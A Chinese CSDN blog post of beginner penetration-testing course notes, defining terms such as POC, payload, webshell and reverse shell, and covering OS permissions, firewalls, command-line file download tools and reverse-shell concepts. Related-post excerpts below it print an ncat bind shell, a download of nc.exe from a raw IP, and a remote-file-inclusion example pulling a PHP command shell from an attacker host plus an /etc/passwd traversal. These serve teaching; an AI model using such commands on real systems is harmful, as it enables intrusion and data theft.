1、基础入门——操作系统&文件下载&反弹SHELL&防火墙绕过

已于 2023-11-26 10:03:32 修改
阅读量363 收藏 1
点赞数 1
分类专栏: 小迪安全 文章标签: 笔记
于 2023-11-19 22:09:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/134495788
版权

名词解释

  • POC:验证漏洞存在的代码;

  • EXP:利用漏洞的代码;

  • payload:漏洞利用载荷。

    常规情况下用exp攻破了系统,需要与靶机进行通信,以便操纵靶机,一般用反弹shell,这个反弹shell的代码就是payload.

  • shellcode:漏洞代码,

  • webshell:特指网站后门;

  • 木马:强调控制电脑

  • 病毒:破坏性程序;

  • 反弹shell:将权限反弹到其他机器上;

  • 跳板:中介

  • 黑盒测试:没有代码,不知目标情况;

  • 白盒测试:知道代码

  • 社会工程学:“社工”

  • 撞库:从泄露的数据库(社工库)中获取想要的信息;

  • ATT&CK:红蓝对抗框架,MITRE ATT&CK®

渗透测试常用术语总结 - 11阳光 - 博客园 (cnblogs.com)

基础案例1:操作系统——命令&权限&用户&防火墙

1、windows&linux常见命令

【3】web安全入门篇-渗透测试中常用的命令-CSDN博客

2、权限

分为:文件权限、服务权限、用户权限
windows下:administrators代表管理员组,组权限优先于用户权限。

3、防火墙

自带防火墙:对出站基本上没检测,对入站检测很严格。
WAF:web层面的防火墙。

实用案例1:文件上传下载——解决无图形化&解决数据传输

目的:

  1. 解决无图形化:就是说在没有图形化界面时,需要使用命令行进行文件上传与下载;
  2. 解决数据传输:进行文件上传与下载的目的是为了上传/下载shell,建立攻击机与靶机之间的通讯。

相关命令

linux:wget、curl、python、ruby...
windows:powershell、certutil、bitsadmin...

实用案例2:反弹shell——解决数据回显&解决数据通讯

目的:

  1. 数据回显:输出命令执行过程中的信息;
  2. 数据通信:

在NAT模式下,VMnet8充当主机与虚拟机之间信息交换的桥梁,启用VMnet8,主机和虚拟机之间是可以互ping的。
![[Pasted image 20231117145845.png]]

禁用VMnet8,虚拟机处在内网环境下,虚拟机可以ping通主机,主机ping不通虚拟机。
在这里插入图片描述

端口转发与端口映射

正向连接和反向连接:以本机为基准,本机连接虚拟机,属于正向连接;虚拟机连接本机,属于反向连接。

渗透测试资源:棱角社区

PT_silver
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
Ubuntu入门(一) Shell操作 VIM文本编辑 Linux文件系统
01-09
常用Shell命令2.APT下载3.VIM文本编辑4.Linux文件系统4.1.Linux文件系统结构4.2.Linux常用文件操作命令4.3.文件压缩&解压缩命令4.4.文件查询&搜索4.5.文件类型 1.常用Shell命令 ls:目录信息查看命令,主要用于显示...
第1天:基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过
qq_56414082的博客
10-27 310
在kali中执行wget http://47.100.167.248:8081/NC.exe -O exploit.exe,就可以下载文件。执行命令的时候,会有数据的回显,告诉自己这个命令是不是执行成功,有没有文件,但是在大部分的测试环境是没有回显的或者是回显是不齐全的。这里自己创建一个直接访问www.xiaodi8.com/nc.exe 就可以直接下载的连接。服务器是一台电脑,可以支持多个应用程序同时运行,可以处理多个同时连接,而电脑不能。用户组是一群用户的统称,给以给这个组配置不同的权限。
【小迪安全】Day01基础入门-专业名词&文件上传下载及案例
2201_75772809的博客
04-21 385
> xiaodi8 防火墙。xiaodi8 防火墙 -> aliyun。内网 -> xiaodi8。——黑客工具:瑞士军刀。
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
反弹shell的N种姿势
记录并分享学习安全的知识点..
09-13 1万+
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
Linux下几种反弹Shell方法的总结与理解(利用bash脚本)
weixin_43803070的博客
07-10 2134
之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上,下面来介绍分析几种常用的方法。 实验环境: CentOS 6.5:192.168...
第5天:基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
IceCream的博客
04-03 1799
常规基本渗透命令详解:https://blog.csdn.net/weixin_43303273/article/details/83029138名词介绍:https://www.cnblogs.com/sunny11/p/13583083.html反弹shell命令生成:https://forum.ywhack.com/bountytips.php?download文件下载:https://forum.ywhack.com/bountytips.php?download**为什么使用命令下载:**文件的上
web安全学习笔记【05】——反弹Shell、正反向连接
weixin_42090431的博客
01-21 1104
命令生成:https://forum.ywhack.com/bountytips.php?ncat -e /bin/sh -lvp 5566(把/bin/sh绑定到本地的5566)命令生成:https://forum.ywhack.com/shell.php。windows上面//绑定CMD到本地5566端口(需要下载第三方工具nc)抓包技术:HTTP/TCP/UDP/ICMP/DNS/封包/代理等。安全产品:CDN/WAF/IDS/IPS/蜜罐/防火墙/杀毒等。
东南大学操作系统课程设计——Shell的实现
07-03
此资源包含完整代码和完整实验报告(加上你的学号姓名即可提交)
深入理解Linux shell中2>&1的含义(全网最全,看完就懂)
09-14
主要介绍了深入理解Linux shell中2>&1的含义,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
操作系统shell基础相关命令
09-04
"操作系统shell基础相关命令" 操作系统shell基础相关命令是计算机科学与技术系操作系统实训的一部分,它涵盖了shell变量、重定向、管道等相关命令的使用。通过本次实验,学生可以掌握shell基础相关命令,熟悉shell...
Linux操作系统基础入门.md
06-09
Linux操作系统基础入门.md
Python学习笔记11 -- 细碎内容
最新发布
m0_71291382的博客
06-12 234
记录一些琐碎点,包括如何注释、变量常量说明、字符串拼接的三种方法及转义字符的简单说明
[ue5]建模场景学习笔记(5)——必修内容可交互的地形,交互沙(3)
qq_40128113的博客
06-09 336
5.第一想法直接clear掉,但直接clear会把想要保留的痕迹一并去除,跑起来就没有痕迹!所以不行,要做一个转载,先把痕迹保留在一个载体上,清楚原来痕迹,用sandsave表示,再把这个载体的痕迹保存回原来rt,这样之前的痕迹被清空了,只留下了保存在载体上的部分,正好符合我们想要的部分。我们现在已经能够让这片地形出现在任意地方,只要角色走在这片地形上,就能够产生痕迹,但这片区域总是需要人工指定,又无法把这片区域无限扩大(显存爆炸),因此尝试使角色无论走到哪里都能产生痕迹。否则绘制不到画板上。
《雅思口语真经总纲1.0》笔记——第二章:官方评分标准真经——Lexical Resource 词汇资源——三十组同义形容词列表
Dontla的博客
06-09 623
直接提取词汇重点,不看例句了。
Nginx学习笔记(十)如何配置HTTPS协议?(公网)
ACGkaka的博客
06-10 725
Nginx学习笔记(十)如何配置HTTPS协议?(公网)
802.11漫游流程简单解析与笔记_Part3
Mr_liu_666的博客
06-10 245
看过Part1的应该都知道,标准关联流程是auth*2 associate*2 key*4,但ns3里面没有与auth有关的部分,third脚本里面有cap字段,但无auth也无key,所以part3是空的
服务器端文件包含,btslab全攻略——注入之远程文件包含&服务器端包含
05-22
远程文件包含(Remote File Inclusion,RFI)和服务器端文件包含(Server Side Include,SSI)是常见的Web应用程序漏洞,攻击者通过利用这些漏洞可以获取网站服务器上的敏感信息,甚至控制整个服务器。下面我来介绍一下这两种漏洞。 一、远程文件包含 远程文件包含是指攻击者通过Web应用程序加载远程托管的文件,这些文件可能包含恶意代码,攻击者可以利用这些代码执行各种攻击,例如窃取敏感信息、控制服务器等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载远程的evil.txt文件,并执行其中的代码。攻击者可以在evil.txt中写入任意的PHP代码,例如: ``` <?php echo shell_exec($_GET['cmd']); ?> ``` 这段代码会执行用户传入的cmd参数,并将结果输出,攻击者可以通过以下URL执行任意的系统命令: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt&cmd=ls%20-la ``` 二、服务器端文件包含 服务器端文件包含是指Web应用程序在处理动态内容时,将用户输入作为文件名或路径名进行处理,攻击者可以利用这个漏洞访问其他文件中的代码,例如配置文件、用户数据等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=../../../etc/passwd ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载/etc/passwd文件,并将其中的内容输出到页面上,攻击者可以通过这种方式获取敏感信息。 总结 要防止远程文件包含和服务器端文件包含漏洞,应该对所有用户输入进行过滤和验证,避免用户输入作为文件名或路径名进行处理。应用程序应该使用白名单机制,仅允许访问特定目录下的文件,而不是允许任意文件的访问。此外,应用程序应该启用PHP的安全模式,禁止执行外部命令、禁止访问网络等操作,以提高安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值